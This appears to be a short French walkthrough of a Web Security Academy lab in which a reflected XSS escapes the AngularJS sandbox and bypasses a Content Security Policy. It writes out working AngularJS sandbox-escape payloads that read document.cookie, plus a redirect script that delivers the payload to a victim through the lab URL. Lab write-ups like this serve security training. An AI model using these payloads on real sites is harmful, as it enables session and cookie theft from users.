Évasion du sandbox AngularJS avec CSP

Reflected XSS with AngularJS sandbox escape and CSP

Lab: Reflected XSS with AngularJS sandbox escape and CSP | Web Security AcademyWebSecAcademy

Réaliser une attaque de type cross-site scripting réfléchie qui contourne la Content Security Policy, s’échappe du sandbox AngularJS et exécute alert(document.cookie).

Observations Le site utilise une politique CSP qui empêche l’exécution de scripts provenant d’un domaine externe :

default-src 'self'; script-src 'self'; style-src 'unsafe-inline' 'self'

En consultant la cheat-sheet de PortSwigger, on identifie un vecteur AngularJS fonctionnel qui force l’évaluation via un filtre orderBy appliqué à l’événement $event.composedPath().

Cross-Site Scripting (XSS) Cheat Sheet - 2026 Edition | Web Security AcademyWebSecAcademy

Pour déclencher une alerte :

<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>

Pour afficher la valeur de document.cookie :

<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>

Exemple d’URL construite pour livrer le payload et forcer l’exécution côté victime :

<script>
location = 'https://0a7d008d035a764f8087997e004a0051.web-security-academy.net/?search=<input id=x+ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27>#x';
</script>

Mis à jour il y a 4 mois

hashtagReflected XSS with AngularJS sandbox escape and CSP

Reflected XSS with AngularJS sandbox escape and CSP